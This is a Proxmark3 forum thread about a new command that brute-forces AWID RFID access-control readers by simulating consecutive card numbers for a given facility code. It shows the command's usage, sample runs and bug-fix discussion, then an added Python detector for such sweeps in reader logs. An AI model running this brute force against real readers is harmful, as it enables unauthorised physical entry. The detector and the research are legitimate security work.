I got a bit tired of things this evening, and added a bruteforce mode for the LF AWID commands.
It is a simple bruteforce, which takes a facility-code and iterates all possible 16-bit card-nums, which it sends to the device as a sim command (lf awid sim).
When aborted by the keyboard, it sends another USB command, which the loops on the device side should pick up and stop the current simulation.
However, I don't have an AWID reader to test it on.
[edit] added delay, cardnumber parameter
pm3 --> lf awid
help        This help
fskdemod    Realtime AWID FSK demodulator
sim         AWID tag simulator
clone       Clone AWID to T55x7
brute       Bruteforce card number against reader

pm3 --> lf awid brute h
Enables bruteforce of AWID reader with specified facility-code.
This is a attack against reader. if cardnumber is given, it starts with it and goes up / down one step
if cardnumber is not given, it starts with 1 and goes up to 65535

Usage: lf awid brute [h] a <format> f <facility-code> c <cardnumber> d <delay>
Options:
      h                   : This help
      a <format>          : format length 26|50
      f <facility-code>   : 8|16bit value facility code
      c <cardnumber>      : (optional) cardnumber to start with, max 65535
      d <delay>           : delay betweens attempts in ms. Default 1000ms
Samples:
      lf awid brute a 26 f 224
      lf awid brute a 50 f 2001 d 2000
      lf awid brute a 50 f 2001 c 200 d 2000

pm3 --> lf aw bru a 26 f 245
Bruteforceing AWID26
Press pm3-button to abort simulation or run another command
Trying FC: 245; CN: 1
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4794
Trying FC: 245; CN: 2
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4794
Trying FC: 245; CN: 3
Trying FC: 245; CN: 4
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4794
Trying FC: 245; CN: 5
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4798
Trying FC: 245; CN: 6
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4798
Trying FC: 245; CN: 7
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4798
Trying FC: 245; CN: 8
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4794
Trying FC: 245; CN: 9
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4794
Trying FC: 245; CN: 10
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4794
Last edited by iceman (2015-12-14 22:44:56)
Great work, I will test it out if I get my hands on an AWID access system.
After some chats with @crayon yesterday, the suggestion came up of adding a variable delay instead of the fixed 1 second.
The command also had a bug with parsing: the stringlen check was too strict.
I'm still having problems with the device side; it doesn't receive all new sim commands nor the ping command to cancel inside the loop, ref: https://github.com/iceman1001/proxmark3 … ops.c#L401
Suggestions on how to fix it would be appreciated.
Also added the possibility to give a cardnumber; if given, the loop uses it and starts checking one up/down until it reaches 0 and 65535.
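Seen from the access-control side, the brute mode discussed in this thread shows up as a burst of denied reads on one reader with a fixed facility code and densely packed card numbers, whether they are tried in ascending order or stepping up/down around a start value. The following is an added example, not part of the original posts or the Proxmark3 code base: a Python detector for that pattern in reader logs. The event tuple layout, reader names, thresholds and the sample log (including the exact up/down order) are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

def longest_run(cns, max_gap):
    """Longest run in sorted distinct card numbers whose neighbours differ by <= max_gap."""
    best = run = [cns[0]]
    for c in cns[1:]:
        run = run + [c] if c - run[-1] <= max_gap else [c]
        if len(run) > len(best):
            best = run
    return best

def detect_sweeps(events, window_s=60, min_run=8, max_gap=2):
    """events: (epoch_s, reader, facility_code, card_number, granted).
    Returns one alert per (reader, facility_code) whose denied reads inside the
    window cover a near-contiguous card-number range, whatever order they came in."""
    recent = defaultdict(deque)            # (reader, fc) -> (ts, cn) of denied reads
    alerts, seen = [], set()
    for ts, reader, fc, cn, granted in sorted(events):
        key = (reader, fc)
        if granted or key in seen:         # only denied reads; alert once per key
            continue
        q = recent[key]
        q.append((ts, cn))
        while ts - q[0][0] > window_s:     # expire reads older than the window
            q.popleft()
        run = longest_run(sorted({c for _, c in q}), max_gap)
        if len(run) >= min_run:            # unrelated outlier reads do not break a run
            seen.add(key)
            alerts.append({"reader": reader, "fc": fc,
                           "lo": run[0], "hi": run[-1], "at": ts})
    return alerts

def sample_events():
    """Constructed log, not captured from a real access-control system."""
    # Ascending card numbers 1..10 with FC 245, one read per second.
    ev = [(1000 + i, "door-1", 245, cn, False) for i, cn in enumerate(range(1, 11))]
    # Up/down stepping around 200 with FC 2001, one read every two seconds.
    updown = [200, 201, 199, 202, 198, 203, 197, 204, 196, 205]
    ev += [(2000 + 2 * i, "door-2", 2001, cn, False) for i, cn in enumerate(updown)]
    # Ordinary scattered denied reads, which must not alert.
    ev += [(3000 + 5 * i, "door-3", 245, cn, False)
           for i, cn in enumerate([1024, 37, 50211, 1025, 9])]
    # An unrelated denied card and a granted read during the door-1 burst.
    ev += [(1003, "door-1", 245, 40117, False), (1004, "door-1", 245, 512, True)]
    return ev

if __name__ == "__main__":
    for alert in detect_sweeps(sample_events()):
        print(alert)
```

`window_s` and `min_run` have to be sized against the reader's normal denied-read rate and the interval between reads: a window shorter than `min_run` times that interval never accumulates a run.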